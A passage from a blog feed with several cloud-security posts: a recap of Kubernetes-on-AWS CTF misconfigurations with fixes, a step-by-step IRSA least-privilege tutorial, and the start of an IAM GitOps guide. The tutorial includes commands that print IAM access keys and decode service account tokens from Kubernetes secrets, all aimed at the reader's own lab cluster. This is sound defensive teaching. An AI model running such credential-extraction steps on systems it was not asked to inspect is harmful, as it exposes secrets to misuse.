<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701002755626/56a64531-cbe4-4d5d-ba93-40aa2554a857.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-3-tier-architecture-in-azure">3 tier architecture in Azure</h4>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701003087033/7823da03-0ab4-42a1-8d0f-c50f8c2a8566.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>The synchronous prompt chaining feature in PartyRock excited me the most. Updating the main question triggers the execution of the app, generates content &amp; the content is automatically passed as input to a different prompt to perform other operation &amp; so on making it powerful.</p>
]]></content:encoded></item><item><title><![CDATA[Decoding EKS Cluster Games CTF]]></title><description><![CDATA[EKS Cluster Games is a decent cybersecurity CTF that revolves around Kubernetes on AWS & security. You get 5 challenges to solve. If you are new to Kubernetes security, this is a nice way to assess yourself.
I've completed all the challenges & got th...]]></description><link>https://blog.rewanthtammana.com/decoding-eks-cluster-games-ctf</link><guid isPermaLink="true">https://blog.rewanthtammana.com/decoding-eks-cluster-games-ctf</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[EKS]]></category><category><![CDATA[AWS]]></category><category><![CDATA[CTF]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sun, 12 Nov 2023 01:46:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1699753668036/8ee98c28-8ce3-4964-85eb-dcedbd3436c2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><a target="_blank" href="https://eksclustergames.com">EKS Cluster Games</a> is a decent <a target="_blank" href="https://en.wikipedia.org/wiki/Capture_the_flag_(cybersecurity)">cybersecurity CTF</a> that revolves around Kubernetes on AWS &amp; security. You get 5 challenges to solve. If you are new to Kubernetes security, this is a nice way to assess yourself.</p>
<p>I've completed all the challenges &amp; got this certificate.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1699750928170/37d42823-044e-4d12-872f-efc2664a13e2.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1699750995078/79e08ba3-c8f6-45c6-a4a2-f1acd7207fa0.png" alt class="image--center mx-auto" /></p>
<p>The challenges are fun &amp; I don't want to spoil the thrill for you. Hence, we won't discuss the solutions here, instead, we will look at what are the types of misconfigurations in each challenge that lead to system compromise.</p>
<h3 id="heading-challenge-1-exposed-secrets"><strong>Challenge 1: Exposed Secrets</strong></h3>
<ul>
<li><p><strong>Vulnerability</strong>: Unrestricted access to Kubernetes secrets.</p>
</li>
<li><p><strong>Root Cause</strong>: Overly permissive RBAC (Role-Based Access Control) settings that allow broader than necessary access rights revealed the Kubernetes secrets.</p>
</li>
<li><p><strong>Patch</strong>: Restrict access to secrets using RBAC, ensuring only necessary roles have the 'get secrets' permission​​.</p>
</li>
</ul>
<h3 id="heading-challenge-2-exposed-image-pull-secrets"><strong>Challenge 2:</strong> Exposed Image Pull Secrets</h3>
<ul>
<li><p><strong>Vulnerability</strong>: Improper management of container image pull secrets.</p>
</li>
<li><p><strong>Root Cause</strong>: Lack of segregation and restriction on secret access, allowing unauthorized retrieval of sensitive data.</p>
</li>
<li><p><strong>Patch</strong>: Regularly audit and restrict access to image pull secrets. Apply appropriate RBAC policies.</p>
</li>
</ul>
<h3 id="heading-challenge-3-metadata-service-exploitation"><strong>Challenge 3: Metadata Service Exploitation</strong></h3>
<ul>
<li><p><strong>Vulnerability</strong>: Unrestricted access to the EC2 instance metadata service (IMDSv1) from within the Kubernetes pod.</p>
</li>
<li><p><strong>Root Cause</strong>: Default configuration of IMDSv1 allows any process within the instance to access sensitive IAM credentials.</p>
</li>
<li><p><strong>Patch</strong>: Restrict or disable IMDSv1 access and migrate to IMDSv2 which requires a token to access metadata​​. Additionally, if not required, block pod access to instance metadata using network policies or iptables.</p>
</li>
</ul>
<h3 id="heading-challenge-4-iam-role-misconfiguration"><strong>Challenge 4: IAM Role</strong> Misconfiguration</h3>
<ul>
<li><p><strong>Vulnerability</strong>: The service account had zero permissions, but the ability to assume node’s IAM role led to exploitation.</p>
</li>
<li><p><strong>Root Cause</strong>: Excessive IAM permissions granted to the node role, which can be misused if accessed.</p>
</li>
<li><p><strong>Patch</strong>: Principle of least privilege should be enforced for IAM roles associated with Kubernetes nodes and services​​.</p>
</li>
</ul>
<h3 id="heading-challenge-5-flawed-iam-trust-policy"><strong>Challenge 5: Flawed IAM Trust Policy</strong></h3>
<ul>
<li><p><strong>Vulnerability</strong>: Flaws in the IAM role trust policy allowed unintended access.</p>
</li>
<li><p><strong>Root Cause</strong>: The trust policy lacked an essential check on the subject claim, allowing any service account to assume a role in the cluster.</p>
</li>
<li><p><strong>Patch</strong>: Revise IAM trust policies to include stringent conditions, like checking the <code>sub</code> claim to match specific service accounts​​, so others cannot escalate the privileges.</p>
</li>
</ul>
<h3 id="heading-conclusion">Conclusion</h3>
<p>These vulnerabilities are just the tip of the iceberg in containers, Kubernetes &amp; cloud security space. It's always important to have automated systems to look for possible vulnerabilities &amp; misconfigurations.</p>
<p>Want to learn more about EKS security? Make sure to subscribe to the newsletter. I've a series coming up soon!</p>
]]></content:encoded></item><item><title><![CDATA[Securing AWS EKS: Implementing Least-Privilege Access with IRSA]]></title><description><![CDATA[Ensuring least-privilege access in Kubernetes can be complex at times for security & DevOps teams. This blog aims to cover a variety of scenarios where the EKS cluster connects with other AWS resources. This is the architecture of the multiple scenar...]]></description><link>https://blog.rewanthtammana.com/securing-aws-eks-implementing-least-privilege-access-with-irsa</link><guid isPermaLink="true">https://blog.rewanthtammana.com/securing-aws-eks-implementing-least-privilege-access-with-irsa</guid><category><![CDATA[AWS]]></category><category><![CDATA[IAM]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[EKS]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Thu, 12 Oct 2023 06:42:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1696769385227/40723bb9-34ef-4467-be19-29e21f8db6fa.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Ensuring least-privilege access in Kubernetes can be complex at times for security &amp; DevOps teams. This blog aims to cover a variety of scenarios where the EKS cluster connects with other AWS resources. This is the architecture of the multiple scenarios we will build.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696781275440/64c8cd8c-3e96-4e41-b560-af245024a7ae.png" alt class="image--center mx-auto" /></p>
<p>Different ways to connect with AWS services:</p>
<ol>
<li><p>Using IAM User Credentials through Environment Variables</p>
</li>
<li><p>Assign permissions to the EKS worker nodes</p>
</li>
<li><p>IAM Roles for Service Accounts (IRSA)</p>
</li>
</ol>
<h3 id="heading-prerequisites">Prerequisites</h3>
<p>Before getting started, a few terminologies to get familiar with.</p>
<p>IRSA refers to "IAM Roles for Service Accounts".</p>
<p>OpenID Connect (OIDC) identity provider is a service in AWS that allows you to manage identity federation and user identities in a scalable and secure way. In the context of Amazon EKS, OIDC is used to associate IAM roles with Kubernetes service accounts. This allows Kubernetes pods to have specific IAM roles, providing a secure and fine-grained way to grant AWS permissions to pods.</p>
<h3 id="heading-scenario">Scenario</h3>
<p>Assume we have an application that fetches random images from the internet every 30 seconds, &amp; uploads them to an s3 bucket.</p>
<p>To deploy this application, the primary requirement is to enable the application to authenticate with the S3 bucket and push images.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696667114339/3d41215b-2d2e-43a5-acfb-df852d02c237.png" alt /></p>
<p>The code is available here. If you want to build your image or use the existing ones.</p>
<pre><code class="lang-bash">IMAGE=rewanthtammana/secure-eks:v1
git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/secure-eks
<span class="hljs-built_in">cd</span> secure-eks/least-privilege-access
docker build -t <span class="hljs-variable">$IMAGE</span> .
docker push <span class="hljs-variable">$IMAGE</span>
</code></pre>
<h3 id="heading-create-required-aws-resources">Create required AWS resources</h3>
<h4 id="heading-change-aws-cli-output-from-vim-to-terminal">Change AWS CLI Output from Vim to Terminal</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> AWS_PAGER=
</code></pre>
<h4 id="heading-eks-cluster">EKS cluster</h4>
<p>Make sure to have a cluster. If you don't, create one.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> cluster_name=secure-eks
eksctl create cluster <span class="hljs-variable">$cluster_name</span> -M 1 -m 1 --ssh-access
</code></pre>
<h4 id="heading-create-s3-bucket">Create s3 bucket</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> bucket_name=secure-eks-s3-$(uuidgen | tr <span class="hljs-string">'[:upper:]'</span> <span class="hljs-string">'[:lower:]'</span>)
aws s3api create-bucket --bucket <span class="hljs-variable">$bucket_name</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Created bucket: <span class="hljs-variable">$bucket_name</span>"</span>
</code></pre>
<h4 id="heading-create-a-policy-to-allow-write-operations-to-this-s3-bucket">Create a policy to allow write operations to this S3 bucket</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"{
    \"Version\": \"2012-10-17\",
    \"Statement\": [
        {
            \"Effect\": \"Allow\",
            \"Action\": [
                \"s3:PutObject\"
            ],
            \"Resource\": [
                \"arn:aws:s3:::<span class="hljs-variable">$bucket_name</span>/*\"
            ]
        }
    ]
}"</span> &gt; s3-<span class="hljs-variable">$bucket_name</span>-access.json

<span class="hljs-built_in">export</span> policy_name=secure-eks-s3-write-policy
<span class="hljs-built_in">export</span> create_policy_output=$(aws iam create-policy --policy-name <span class="hljs-variable">$policy_name</span> --policy-document file://s3-<span class="hljs-variable">$bucket_name</span>-access.json)
<span class="hljs-built_in">export</span> policy_arn=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$create_policy_output</span> | jq -r <span class="hljs-string">'.Policy.Arn'</span>)
</code></pre>
<h3 id="heading-using-iam-user-credentials-through-environment-variables">Using IAM User Credentials through Environment Variables</h3>
<p>Now, we have the cluster &amp; S3 bucket. To ensure our application can connect with the S3 bucket, we need to create an IAM user with permission to access our s3 bucket.</p>
<h4 id="heading-create-iam-user">Create IAM user</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> iam_user=secure-eks-iam-user
aws iam create-user --user-name <span class="hljs-variable">$iam_user</span>
</code></pre>
<h4 id="heading-attach-the-policy-to-the-iam-user">Attach the policy to the IAM user</h4>
<pre><code class="lang-bash">aws iam attach-user-policy --user-name <span class="hljs-variable">$iam_user</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
</code></pre>
<h4 id="heading-create-access-amp-secret-key-for-iam-user">Create access &amp; secret key for IAM user</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> results=$(aws iam create-access-key --user-name <span class="hljs-variable">$iam_user</span>)
<span class="hljs-built_in">export</span> access_key=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$results</span> | jq -r <span class="hljs-string">'.AccessKey.AccessKeyId'</span>)
<span class="hljs-built_in">export</span> secret_key=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$results</span> | jq -r <span class="hljs-string">'.AccessKey.SecretAccessKey'</span>)
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Access Key: <span class="hljs-variable">$access_key</span>"</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Secret Key: <span class="hljs-variable">$secret_key</span>"</span>
</code></pre>
<h4 id="heading-create-kubernetes-job">Create Kubernetes Job</h4>
<p>With the above information of access &amp; secret key, we can allow our application to connect with a specific s3 bucket.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: environment-variables-job
spec:
  template:
    spec:
      containers:
      - name: environment-variables-container
        image: rewanthtammana/secure-eks:v1
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: AWS_ACCESS_KEY
          value: <span class="hljs-variable">$access_key</span>
        - name: AWS_SECRET_KEY
          value: <span class="hljs-variable">$secret_key</span>
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$bucket_name</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696667114339/3d41215b-2d2e-43a5-acfb-df852d02c237.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-summary">Summary</h4>
<p>We successfully connected our application with the AWS S3 bucket to push its images. But from an operational &amp; security standpoint, this isn't the best approach.</p>
<ul>
<li><p>It's complex to maintain, rotate &amp; secure these credentials from leaking.</p>
</li>
<li><p>What if someone gets their hand on the authentication details?</p>
</li>
<li><p>What if they use it to exfiltrate the data?</p>
</li>
<li><p>What if they use it to manipulate the information?</p>
</li>
<li><p>How to differentiate b/w legitimate &amp; malicious requests?</p>
</li>
</ul>
<p>A lot of questions pop up &amp; it ain't pretty. We will discuss alternate &amp; better ways to accomplish the goal in the following sections.</p>
<h4 id="heading-cleanup">Cleanup</h4>
<p>Delete the resources before proceeding to next section</p>
<pre><code class="lang-bash">aws iam detach-user-policy --user-name <span class="hljs-variable">$iam_user</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
aws iam delete-access-key --access-key-id <span class="hljs-variable">$access_key</span> --user <span class="hljs-variable">$iam_user</span>
aws iam delete-user --user-name <span class="hljs-variable">$iam_user</span>
</code></pre>
<h3 id="heading-assign-permissions-to-the-eks-worker-nodes">Assign permissions to the EKS worker nodes</h3>
<p>In the above scenario, we learned that it's challenging to secure and rotate the access keys, etc. An alternative approach would be to assign permissions to the EKS worker nodes to access the s3 bucket.</p>
<h4 id="heading-get-eks-worker-node-arn">Get EKS worker node ARN</h4>
<p>In this case, we created a single-node cluster, so we have only one worker node.</p>
<pre><code class="lang-bash">eks_worker_node_role_name=$(eksctl get nodegroup --cluster <span class="hljs-variable">$cluster_name</span> -o json | jq -r <span class="hljs-string">'.[].NodeInstanceRoleARN'</span> | cut -d <span class="hljs-string">'/'</span> -f 2)
</code></pre>
<h4 id="heading-attach-the-policy-to-the-eks-worker-node-role">Attach the policy to the EKS worker node role</h4>
<pre><code class="lang-bash">aws iam attach-role-policy --role-name <span class="hljs-variable">$eks_worker_node_role_name</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
</code></pre>
<h4 id="heading-create-kubernetes-job-1">Create Kubernetes Job</h4>
<p>Make sure you have the <code>bucket_name</code> environment variable.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: environment-variables-job
spec:
  template:
    spec:
      containers:
      - name: environment-variables-container
        image: rewanthtammana/secure-eks:ok-amd64
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$bucket_name</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696746570810/a55ff930-9385-4876-8841-861169c58bdf.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-summary-1">Summary</h4>
<p>This is better than the previous method but the issue with this approach is that any pod created on this node will have excessive permissions, in this case, S3 bucket push permissions violating the least privilege principle. To overcome these risks, we will use IRSA.</p>
<h4 id="heading-cleanup-1">Cleanup</h4>
<p>Detach the role policy before proceeding to next section</p>
<pre><code class="lang-bash">aws iam detach-role-policy --role-name <span class="hljs-variable">$eks_worker_node_role_name</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
</code></pre>
<h3 id="heading-iam-roles-for-service-accounts-irsa">IAM Roles for Service Accounts (IRSA)</h3>
<h4 id="heading-check-if-the-iam-openid-connect-provider-status">Check if the IAM OpenID Connect provider status</h4>
<pre><code class="lang-bash">eksctl get cluster <span class="hljs-variable">$cluster_name</span> -ojson | jq -r <span class="hljs-string">'.[].Tags["alpha.eksctl.io/cluster-oidc-enabled"]'</span>
</code></pre>
<h4 id="heading-create-iam-openid-connect-provider">Create IAM OpenID Connect provider</h4>
<p>If it's not enabled, enable it</p>
<pre><code class="lang-bash">eksctl utils associate-iam-oidc-provider --cluster <span class="hljs-variable">$cluster_name</span> --approve
</code></pre>
<h4 id="heading-create-a-policy-to-allow-access-to-the-s3-bucket">Create a policy to allow access to the S3 bucket</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"{
    \"Version\": \"2012-10-17\",
    \"Statement\": [
        {
            \"Effect\": \"Allow\",
            \"Action\": [
                \"s3:PutObject\"
            ],
            \"Resource\": [
                \"arn:aws:s3:::<span class="hljs-variable">$bucket_name</span>/*\"
            ]
        }
    ]
}"</span> &gt; s3-<span class="hljs-variable">$bucket_name</span>-access.json

<span class="hljs-built_in">export</span> policy_name=secure-eks-s3-write-policy
<span class="hljs-built_in">export</span> create_policy_output=$(aws iam create-policy --policy-name <span class="hljs-variable">$policy_name</span> --policy-document file://s3-<span class="hljs-variable">$bucket_name</span>-access.json)
<span class="hljs-built_in">export</span> policy_arn=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$create_policy_output</span> | jq -r <span class="hljs-string">'.Policy.Arn'</span>)
</code></pre>
<h4 id="heading-create-an-iam-service-account-with-the-above-policy">Create an IAM service account with the above policy</h4>
<pre><code class="lang-bash">eks_service_account=s3-write-service-account
eksctl create iamserviceaccount --name <span class="hljs-variable">$eks_service_account</span> --namespace default --cluster <span class="hljs-variable">$cluster_name</span> --attach-policy-arn <span class="hljs-variable">$policy_arn</span> --approve
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696751669138/048b0bd2-6113-4de6-b4ae-33b24c758902.png" alt class="image--center mx-auto" /></p>
<p><strong>Create Kubernetes Job</strong></p>
<pre><code class="lang-bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: environment-variables-job
spec:
  template:
    spec:
      serviceAccountName: <span class="hljs-variable">$eks_service_account</span>
      containers:
      - name: environment-variables-container
        image: rewanthtammana/secure-eks:ok-amd64
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$bucket_name</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696756242465/56362ebb-58af-4cbe-95d0-12b709c49ec0.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-cloudformation-jwt-x509-amp-more">CloudFormation, JWT, X509 &amp; more</h3>
<h4 id="heading-examine-cloudformation-of-iam-service-account-creation">Examine CloudFormation of IAM service account creation</h4>
<p>If we observe the above output, CloudFormation was used to create the required resources. Let's have a look at CloudFormation to see a list of created resources.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696751835503/0e14ff80-055d-4d23-8679-66458450eb1e.png" alt class="image--center mx-auto" /></p>
<p>Click on the "Physical ID" link to look at the role permissions</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696751929998/26589a4e-e14d-484b-b7ac-95b58e34d59a.png" alt class="image--center mx-auto" /></p>
<p>Now, we know the service account, <code>s3-write-service-account</code> is linked to IAM role that has permission to upload data to a specific s3 bucket.</p>
<h4 id="heading-examine-service-account">Examine service account</h4>
<p>Let's enumerate the service account for more information.</p>
<pre><code class="lang-bash">kubectl get sa <span class="hljs-variable">$eks_service_account</span> -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753039618/9e50cf78-25ae-4b1e-b368-2f8c7274afe5.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-secrets-associated-with-the-service-account">Examine secrets associated with the service account</h4>
<p>Get the contents of the secret associated with the service account</p>
<pre><code class="lang-bash">sa_secret_name=$(kubectl get sa <span class="hljs-variable">$eks_service_account</span> -ojson | jq -r <span class="hljs-string">'.secrets[0].name'</span>)
kubectl get secrets <span class="hljs-variable">$sa_secret_name</span> -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753280181/4abd70e5-7ae5-4f0b-b2a8-2e10a9bb2aa0.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-x509-cacrt-in-the-secret-associated-with-the-service-account">Examine X.509 ca.crt in the secret associated with the service account</h4>
<p>In the above image, we can see the <code>ca.crt</code> certificate. Let's decode the certificate to view information like expiry, issuer, etc.</p>
<pre><code class="lang-bash">kubectl get secret <span class="hljs-variable">$sa_secret_name</span> -o json | jq -r <span class="hljs-string">'.data."ca.crt"'</span> | base64 -d
kubectl get secret <span class="hljs-variable">$sa_secret_name</span> -o json | jq -r <span class="hljs-string">'.data."ca.crt"'</span> | base64 -d &gt; certificate.pem
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753960598/beebbc18-9f08-4816-acd5-66d4fcd78cdc.png" alt class="image--center mx-auto" /></p>
<p>Check the subject &amp; issuer of the certificate</p>
<pre><code class="lang-bash">openssl x509 -<span class="hljs-keyword">in</span> certificate.pem -subject -issuer -noout
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696753997798/fc5cfc0c-2a16-4eb4-b66b-41a4349d27af.png" alt class="image--center mx-auto" /></p>
<p>Check the expiry of the certificate</p>
<pre><code class="lang-bash">openssl x509 -<span class="hljs-keyword">in</span> certificate.pem -dates -noout
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696754048360/7668d072-f4d4-415b-8a43-242825e3b2c5.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-the-token-in-the-secret-associated-with-the-service-account">Examine the token in the secret associated with the service account</h4>
<pre><code class="lang-bash">kubectl get secret <span class="hljs-variable">$sa_secret_name</span> -o json | jq -r <span class="hljs-string">'.data."token"'</span> | base64 -d
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696754149658/6269f2cc-c665-4bc2-a375-514096a7f788.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-examine-the-jwt-token-in-jwtio">Examine the JWT token in jwt.io</h4>
<p>Copy the token from the above step, visit <a target="_blank" href="https://jwt.io/">jwt.io</a> &amp; paste it there. As you can see below, the token consists of a lot of information like issuer, namespace, secret name, service account name, etc. If you try to change any of it, the token gets invalidated.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696754633273/b0fd0370-acde-4c0c-8c36-90c0377bb4dd.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-cleanup-2">Cleanup</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># From previous sections, if you missed there</span>
aws iam detach-user-policy --user-name <span class="hljs-variable">$iam_user</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
aws iam detach-role-policy --role-name <span class="hljs-variable">$eks_worker_node_role_name</span> --policy-arn <span class="hljs-variable">$policy_arn</span>
aws iam delete-access-key --access-key-id <span class="hljs-variable">$access_key</span> --user <span class="hljs-variable">$iam_user</span>
aws iam delete-user --user-name <span class="hljs-variable">$iam_user</span>

<span class="hljs-comment"># Actual cleanup</span>
aws iam delete-policy --policy-arn <span class="hljs-variable">$policy_arn</span>
aws s3 rm s3://<span class="hljs-variable">$bucket_name</span> --recursive
aws s3 rb s3://<span class="hljs-variable">$bucket_name</span>
eksctl delete iamserviceaccount --name <span class="hljs-variable">$eks_service_account</span> --namespace default --cluster <span class="hljs-variable">$cluster_name</span>
eksctl delete cluster --name <span class="hljs-variable">$cluster_name</span>
</code></pre>
<h3 id="heading-conclusion">Conclusion</h3>
<p>To conclude, securing access control within Amazon EKS, especially when interacting with other AWS services is a meticulous approach to safeguard against unauthorized access and potential breaches. Through the exploration of various methods in this blog - from embedding IAM user credentials and assigning permissions to EKS worker nodes to the more refined and secure method using IAM Roles for Service Accounts (IRSA) - we've traversed through the landscape of EKS security.</p>
<p>IRSA stands out in terms of security and manageability, providing a mechanism that adheres to the principle of least privilege by assigning AWS permissions to pods, not nodes, thereby reducing the attack surface. It leverages the existing IAM OpenID Connect (OIDC) provider, ensuring a secure and auditable way to utilize AWS services directly from Kubernetes workloads.</p>
<p>This is not the end. Security is an ever-evolving domain &amp; as technologies advance, so do the methodologies to exploit them.</p>
]]></content:encoded></item><item><title><![CDATA[Managing AWS IAM in GitOps Style]]></title><description><![CDATA[Problem
In the modern era of cloud computing, managing infrastructure has evolved beyond manual configurations to embrace GitOps, a paradigm rooted in Infrastructure as Code (IaC). In this comprehensive guide, we'll delve into managing AWS Identity a...]]></description><link>https://blog.rewanthtammana.com/managing-aws-iam-in-gitops-style</link><guid isPermaLink="true">https://blog.rewanthtammana.com/managing-aws-iam-in-gitops-style</guid><category><![CDATA[AWS]]></category><category><![CDATA[IAM]]></category><category><![CDATA[gitops]]></category><category><![CDATA[Terraform]]></category><category><![CDATA[Beginner Developers]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Tue, 29 Aug 2023 05:34:07 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1692761183705/59bc5b43-e255-473c-aa6a-23ac69385c36.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-problem">Problem</h3>
<p>In the modern era of cloud computing, managing infrastructure has evolved beyond manual configurations to embrace GitOps, a paradigm rooted in Infrastructure as Code (IaC). In this comprehensive guide, we'll delve into managing AWS Identity and Access Management (IAM) using a GitOps approach, facilitated by tools like Terraform and Docker, as well as key AWS services. If you're new to AWS, this guide serves as an ideal hands-on introduction, covering essential AWS services like Lambda, EventBridge, CloudTrail, CloudWatch, ECR, and S3.</p>
<h3 id="heading-prerequisites"><strong>Prerequisites</strong></h3>
<ul>
<li><p>AWS account</p>
</li>
<li><p>AWS CLI</p>
</li>
<li><p>Github account</p>
</li>
<li><p>Terraform</p>
</li>
<li><p>Docker</p>
</li>
</ul>
<h3 id="heading-task">Task</h3>
<p>In this blog, we will try to build a gitops-driven (IaC) approach for AWS IAM management. If anyone makes a change to IAM Roles/Policies/SCPs (Service Control Policies), update the change to Github. If someone makes a change in Github, update the policy configuration on AWS.</p>
<p>For this demo, the code is available here - <a target="_blank" href="https://github.com/rewanthtammana/aws-iam-gitops">aws-iam-gitops</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692766917654/49ab7036-63eb-4677-bc21-21b45f19706a.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-architecture">Architecture</h3>
<p>First, we need to understand the components required to achieve our goal. This is the architectural overview of the system to be built.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692761521415/8649040a-fd74-46b5-9ad3-16fe468db6c1.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-components">Components</h3>
<h4 id="heading-github">GitHub</h4>
<p>This is where all the information on IAM Roles, Policies &amp; SCPs will be stored. Make sure to create a Personal Access Token (PAT) with read &amp; write access to the given repository.</p>
<h4 id="heading-iam">IAM</h4>
<p>This is where all the Identity and Access Management information is stored.</p>
<h4 id="heading-cloudtrail">Cloudtrail</h4>
<p>This will log every single operation that occurs on an AWS account.</p>
<h4 id="heading-s3-bucket"><strong>S3 bucket</strong></h4>
<p>This is where all the logs of Cloudtrail are stored.</p>
<h4 id="heading-eventbridge">EventBridge</h4>
<p>This will make it easy to build event-driven applications. In this case, the events we are looking for are IAM changes. We can configure EventBridge to notify/react whenever an IAM change event occurs.</p>
<h4 id="heading-lambda">Lambda</h4>
<p>This will run the given code/container. We don't need to own a server to execute code. In this case, it will be triggered by the EventBridge when an IAM change occurs.</p>
<h4 id="heading-cloudwatch">Cloudwatch</h4>
<p>This is where the Lambda logs are stored.</p>
<h4 id="heading-ecr">ECR</h4>
<p>Elastic Container Registry (ECR) will be used by Lambda to fetch the container image that it has to run.</p>
<h3 id="heading-trust-boundaries">Trust Boundaries</h3>
<h4 id="heading-lambda-to-ecr"><strong>Lambda to ECR</strong></h4>
<p>Lambda has permission to pull images from ECR.</p>
<h4 id="heading-lambda-to-iam"><strong>Lambda to IAM</strong></h4>
<p>Lambda has permission to list roles &amp; policies.</p>
<h4 id="heading-lambda-to-organizations"><strong>Lambda to Organizations</strong></h4>
<p>Lambda has permissions to list SCPs.</p>
<h4 id="heading-lambda-to-github"><strong>Lambda to GitHub</strong></h4>
<p>Lambda uses GitHub tokens to interact with the GitHub API.</p>
<h4 id="heading-eventbridge-to-lambda"><strong>EventBridge to Lambda</strong></h4>
<p>EventBridge has permissions to trigger the Lambda function.</p>
<h4 id="heading-cloudtrail-to-s3"><strong>CloudTrail to S3</strong></h4>
<p>CloudTrail has permission to write logs to the S3 bucket.</p>
<h4 id="heading-eventbridge-to-cloudtrail"><strong>EventBridge to CloudTrail</strong></h4>
<p>EventBridge reads from CloudTrail to trigger events.</p>
<h3 id="heading-workflow">Workflow</h3>
<h4 id="heading-initialization"><strong>Initialization</strong></h4>
<ol>
<li><p>Terraform script sets up all AWS resources.</p>
</li>
<li><p>The lambda function clones the GitHub repo.</p>
</li>
</ol>
<h4 id="heading-event-trigger">Event Trigger</h4>
<ol>
<li><p>Any change in AWS IAM or Organizations is logged by CloudTrail.</p>
</li>
<li><p>EventBridge picks up the change and triggers the Lambda function.</p>
</li>
</ol>
<h4 id="heading-lambda-execution"><strong>Lambda Execution</strong></h4>
<ol>
<li><p>The lambda function lists all IAM roles, policies, and SCPs.</p>
</li>
<li><p>Write this information to the GitHub repo.</p>
</li>
</ol>
<h4 id="heading-commit-to-github">Commit to Github</h4>
<ol>
<li>The lambda function commits and pushes the changes to the GitHub repo.</li>
</ol>
<h4 id="heading-terraform-destroy"><strong>Terraform Destroy</strong></h4>
<ol>
